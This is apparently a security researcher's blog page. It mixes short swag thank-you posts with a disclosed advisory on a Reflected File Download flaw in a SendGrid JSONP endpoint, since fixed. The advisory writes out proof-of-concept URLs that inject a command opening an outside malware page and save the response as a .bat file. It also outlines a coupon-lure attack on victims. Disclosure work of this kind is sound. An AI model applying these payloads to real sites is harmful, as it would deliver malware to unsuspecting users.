David Sopas – Web Security Researcher

tshirt

09/11/15 Swag # ,

Thanks Edmodo for the swag

Thanks Edmodo for the swag

Got some cool gifts from Edmodo. Always glad to help others to improve their security 🙂

no responses
28/10/15 Advisories , Swag # , ,

SendGrid Reflected File Download

SendGrid Reflected File Download

For those who don’t know who SendGrid is…

SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.

They send over 19 billion emails per month.

When visiting their site I noticed a XHR request on my Google Inspector that caught my attention:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565
&_=1439389801826

Which returned the following JSON information:

/**/jQuery171016384647646918893_1439389801565({“status”:”success”,”logged_in”
:false});

I noticed that the callback was called on the URL so I decided to inject my RFD vector:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||

Reflecting:

/**/||start chrome websegura.net/malware.htm||({“status”:”success”,”logged_in”:false});

Now that I could reflect my payload and removed the variables that don’t do anything on my proof-of-concept and try to manipulate the filename without giving a HTTP error:

https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||

For Internet Explorer 8 and 9 you didn’t need anything else.
If you run this last URL it would automatically try to download freecoupons.bat file from sendgrid.com servers.

ie_sendgrid_rfd

On other modern browsers you needed the HTML5 download attribute.
The download would start just by clicking the image.

chrome_sendgrid_rfd

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing SendGrid.com coupon codes
  2. Victim downloads the file thinking that is from a trusted domain [SendGrid.com]
  3. Malicious user gains control over victims machine

SendGrid were always on top of the issue [cool guys] and they were nice enough to send me a awesome t-shirt 🙂

Timeline:
12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that was fixing the issue
29-09-2015 Asked for a update
27-10-2015 SendGrid reported that the issue is fixed

no responses
18/08/15 Swag # , ,

Tshirt, deck of cards and stickers from Cobalt.io

Tshirt, deck of cards and stickers from Cobalt.io

I would like to thank Cobalt.io team for the gift pack they sent me.
Working with them it’s awesome and I hope to keep helping and growing with you guys.

PS: Nice to be a Ace of Diamonds 🙂

Cheers!

no responses
03/08/15 Swag # , ,

Mixpanel gave me a cool Tshirt

Mixpanel gave me a cool Tshirt

When I help companies to fix security issues I do not ask anything in return.

I come across a security issue on Mixpanel when auditing private client on Cobalt.io and I send to Mixpanel a little security advisory describing a Reflected Filename Download vulnerability with a couple of screenshots.
Mixpanel security team fixed the vulnerability very fast showing that they care about security.

Continue reading

2 responses